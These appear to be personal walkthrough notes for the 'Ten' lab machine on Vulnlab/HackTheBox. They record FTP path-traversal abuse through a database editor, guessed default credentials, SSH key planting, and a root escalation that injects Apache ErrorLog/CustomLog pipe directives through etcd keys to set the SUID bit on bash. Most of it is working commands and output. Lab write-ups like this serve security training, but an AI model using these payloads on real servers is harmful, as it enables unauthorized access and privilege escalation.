Here is my notes on TEN box from Vulnlab which deployed to Hackthebox.
TEN: 10.10.105.224
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
220-This is a private system - No anonymous login
#NOPE
#FROM HTTP Port 80 signup.php:
OK
Your personal account is ready to be used:
Username: ten-318b34f7
Password: a3fd45a7
Personal Domain: test.ten.vl
You can use the provided credentials to upload your pages
via ftp://ten.vl.
Login ftp as ten-318b34f7 and we can upload files in there as usual.
Have to find a way to access file uploaded in the web somehow.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful
150 Connecting to port 36623
100% |**************************************************************************************************************| 6 1.50 KiB/s 00:00 ETA
226-File successfully transferred
226 0.269 seconds (measured here), 22.28 bytes per second
6 bytes sent in 00:00 (0.01 KiB/s)
ftp> ls -lah
200 PORT command successful
150 Connecting to port 57125
drwxr-xr-x 2 9084 9084 4096 Dec 7 16:07 .
drwxr-xr-x 2 9084 9084 4096 Dec 7 16:07 ..
-rw-r--r-- 1 9084 9084 6 Dec 7 16:07 test.txt
#After modified dir section in webdb.
ftp> cd /
250 OK. Current directory is /
ftp> ls
229 Extended Passive mode OK (|||29510|)
150 Accepted data connection
lrwxrwxrwx 1 0 root 7 Feb 16 2024 bin -> usr/bin
drwxr-xr-x 4 0 root 4096 Sep 28 10:23 boot
dr-xr-xr-x 2 0 root 4096 Feb 16 2024 cdrom
[SNIP]
250 OK. Current directory is /home
ftp> ls
229 Extended Passive mode OK (|||42279|)
150 Accepted data connection
drwxr-x--- 4 1000 tyrell 4096 Sep 28 14:48 tyrell
Go back to webdb and modify the uid and guid of 1000 to access tyrell directory.
ftp> pwd
Remote directory: /home/tyrell
ftp> ls -lah
229 Extended Passive mode OK (|||15084|)
150 Accepted data connection
drwxr-x--- 4 1000 tyrell 4096 Sep 28 14:48 .
drwxr-xr-x 3 0 root 4096 Sep 28 08:51 ..
lrwxrwxrwx 1 1000 tyrell 9 Sep 28 10:21 .bash_history -> /dev/null
-rw-r--r-- 1 1000 tyrell 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 1000 tyrell 3771 Jan 6 2022 .bashrc
drwx------ 2 1000 tyrell 4096 Sep 28 10:16 .cache
-rw-r--r-- 1 1000 tyrell 807 Jan 6 2022 .profile
drwx------ 2 1000 tyrell 4096 Sep 28 10:16 .ssh
-r-------- 1 1000 tyrell 37 Sep 28 10:20 .user.txt
226-Options: -a -l
226 9 matches total
ftp> cd .ssh
553 Prohibited file name: .ssh
Go back to webdb and modify the dir section with /srv/../home/tyrell/.ssh
So to bypass this, we can change the path of our FTP user to something like /srv/../home/the_user/.ssh
ftp> pwd
Remote directory: /home/tyrell/.ssh
ftp> ls -lah
229 Extended Passive mode OK (|||11498|)
150 Accepted data connection
drwx------ 2 1000 tyrell 4096 Sep 28 10:16 .
drwxr-x--- 4 1000 tyrell 4096 Sep 28 14:48 ..
-rw------- 1 1000 tyrell 162 Sep 28 10:16 authorized_keys
Now generate id_rsa as usual to gain a shell.
ssh -i id_rsa tyrell@10.10.105.224
Last login: Sat Dec 7 16:47:42 2024 from 10.8.0.71
tyrell@ten:~$ whoami
tyrell
tyrell@ten:~$ hostname
ten
USER-SHELL !
tyrell@ten:~$ whoami
tyrell
tyrell@ten:~$ hostname
ten
tyrell@ten:~$ cat .user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 13985452d37bae326a336f18a35a2766 (ECDSA)
|_ 256 2ed58625c16b0e51a22add8244a60063 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Page moved.
info.php = phpinfo.php
info.php?file= - Unknown. - NOPE
NO RFI for info.php - BIG NOPE !
NO LFI either - NOPE !
signup.php:
OK
Your personal account is ready to be used:
Username: ten-318b34f7
Password: a3fd45a7
Personal Domain: test.ten.vl
You can use the provided credentials to upload your pages
via ftp://ten.vl.
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://ten.vl/ -H "Host: FUZZ.ten.vl" --fs 205
webdb [Status: 200, Size: 1685, Words: 55, Lines: 14, Duration: 922ms]
webdb.ten.vl:
Guess Credential works !
Guess Credential:
"user": "user",
"password": "pa55w0rd",
WebDB Version 2024.09.28
-NO CVE about this one - NOPE.
We found pureftpd database contains a credential of ten-318b34f7 as usual.
It seems we can modify pureftpd user guid and uid - Interesting.
Default:
ten-318b34f7 - 9084 and 9084 on both uid and guid.
Query Section = able to mysql command.
USE pureftpd;
SHOW TABLES;
SELECT
*
FROM
users;
#Works like normal
Looking back at FTP:
230 OK. Current directory is /srv/home/ten-318b34f7
It seems we can modify the path of FTP in webdb so let's try that out. - /srv/home/ten-318b34f7
Just edit the dir section with /srv/home/ten-318b34f7 then it should work.
webdb NOTES:
https://ethicxz.github.io/VL-Ten-Machine/#create-user-and-change-path-and-uid
PRIV ESC:
/usr/bin/etcdctl VHOSTS .conf PSPY PRIV ESC NOTES:
https://ethicxz.github.io/VL-Ten-Machine/#use-a-config-file-to-be-root
Use pspy64s then create another ftp account in http port 80 and you will see this:
pspy64s:
2024/12/07 16:58:08 CMD: UID=33 PID=3294 | sh -c ETCDCTL_API=3 /usr/bin/etcdctl put /customers/ten-966a9fd0/url test2
2024/12/07 16:58:08 CMD: UID=33 PID=3295 | sh -c ETCDCTL_API=3 /usr/bin/etcdctl put /customers/ten-966a9fd0/url test2
tyrell@ten:/var/www/html$ ls
attribution.php carousel.css dist get-credentials-please-do-not-spam-this-thanks.php images.txt index.html index.php info.php signup.php
tyrell@ten:/var/www/html$ cat get-credentials-please-do-not-spam-this-thanks.php
<?php
if ( !isset($_POST['domain']) ) {
header('Location: /signup.php');
}
if(!preg_match('/^[0-9a-z]+$/', $_POST['domain'])) {
echo('<font color=red>Domain name can only contain alphanumeric characters.</font>');
} else {
$username = "ten-" . substr(hash("md5",rand()),0,8);
$password = substr(hash("md5",rand()),0,8);
$password_crypt = crypt($password,'$1$OWNhNDE');
sleep(10); // This is only here so that you do not create too many users :)
$mysqli = new mysqli("127.0.0.1", "user", "pa55w0rd", "pureftpd");
$stmt = $mysqli->prepare("INSERT INTO users VALUES ( NULL, ?, ?, ?, ?, ? );");
$uid = random_int(2000,65535);
$dir = "/srv/$username/./";
$stmt->bind_param('ssiis',$username,$password_crypt,$uid,$uid,$dir);
$stmt->execute();
system("ETCDCTL_API=3 /usr/bin/etcdctl put /customers/$username/url " . $_POST['domain']);
echo('<p class="lead">Your personal account is ready to be used:<br><br>Username: <b>'.$username.'</b><br>Password: <b>'.$password.'</b><br>Personal Domain: <b>'.$_POST['domain'].'.ten.vl</b><br><br>You can use the provided credentials to upload your pages<br> via ftp://ten.vl.<br><br><font size="-1">It may take up to one minute for all backend processes to properly identify you as well as your personal virtual host to be available.</font></p>');
}
tyrell@ten:/etc/remco$ pwd
/etc/remco
tyrell@ten:/etc/remco$ cat config
log_level = "info"
log_format = "text"
[[resource]]
name = "apache2"
[[resource.template]]
src = "/etc/remco/templates/010-customers.conf.tmpl"
dst = "/etc/apache2/sites-enabled/010-customers.conf"
reload_cmd = "systemctl restart apache2.service"
[resource.backend]
[resource.backend.etcd]
version = 3
nodes = ["http://127.0.0.1:2379"]
keys = ["/customers"]
watch = true
interval = 5
tyrell@ten:/etc/remco$ cat /etc/apache2/sites-enabled/010-customers.conf
<VirtualHost *:80>
ServerName test.ten.vl
DocumentRoot /srv/ten-318b34f7/
</VirtualHost>
<VirtualHost *:80>
ServerName test2.ten.vl
DocumentRoot /srv/ten-966a9fd0/
</VirtualHost>
So let's experiment with this:
ETCDCTL_API=3 /usr/bin/etcdctl put /customers/ten-966a9fd0/url test3
tyrell@ten:/etc/remco$ ETCDCTL_API=3 /usr/bin/etcdctl put /customers/ten-966a9fd0/url test3
OK
tyrell@ten:/etc/remco$ cat /etc/apache2/sites-enabled/010-customers.conf
<VirtualHost *:80>
ServerName test.ten.vl
DocumentRoot /srv/ten-318b34f7/
</VirtualHost>
<VirtualHost *:80>
ServerName test3.ten.vl
DocumentRoot /srv/ten-966a9fd0/
</VirtualHost>
Now let's exploit it:
ETCDCTL_API=3 /usr/bin/etcdctl put /customers/ten-b94344ef/url 'fake.ten.vl
ErrorLog "|/usr/bin/chmod u+s /usr/bin/bash"
#'
Alternative:
ETCDCTL_API=3 /usr/bin/etcdctl put /customers/ten-b94344ef/url 'fake.ten.vl
CustomLog "|/usr/bin/chmod u+s /usr/bin/bash" common
#'
tyrell@ten:/etc/remco$ ETCDCTL_API=3 /usr/bin/etcdctl put /customers/ten-b94344ef/url 'fake.ten.vl
ErrorLog "|/usr/bin/chmod u+s /usr/bin/bash"
#'
OK
tyrell@ten:/etc/remco$ cat /etc/apache2/sites-enabled/010-customers.conf
<VirtualHost *:80>
ServerName test.ten.vl
DocumentRoot /srv/ten-318b34f7/
</VirtualHost>
<VirtualHost *:80>
ServerName test3.ten.vl
DocumentRoot /srv/ten-966a9fd0/
</VirtualHost>
<VirtualHost *:80>
ServerName fake.ten.vl
ErrorLog "|/usr/bin/chmod u+s /usr/bin/bash"
#.ten.vl
DocumentRoot /srv/ten-b94344ef/
</VirtualHost>
tyrell@ten:/etc/remco$ ls -lah /usr/bin/bash
-rwsr-xr-x 1 root root 1.4M Mar 14 2024 /usr/bin/bash
#Wait a few seconds for root to execute 010-customers.conf file according to pspy64s for /usr/bin/bash to be modified.
tyrell@ten:/etc/remco$ ls -lah /usr/bin/bash
-rwsr-xr-x 1 root root 1.4M Mar 14 2024 /usr/bin/bash
tyrell@ten:/etc/remco$ ls -lah /bin/bash
-rwsr-xr-x 1 root root 1.4M Mar 14 2024 /bin/bash
tyrell@ten:/etc/remco$ /bin/bash -p
bash-5.1# whoami
root
bash-5.1# id
uid=1000(tyrell) gid=1000(tyrell) euid=0(root) groups=1000(tyrell)
bash-5.1# hostname
ten
ROOT-SHELL !
bash-5.1# whoami
root
bash-5.1# hostname
ten
bash-5.1# cat root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel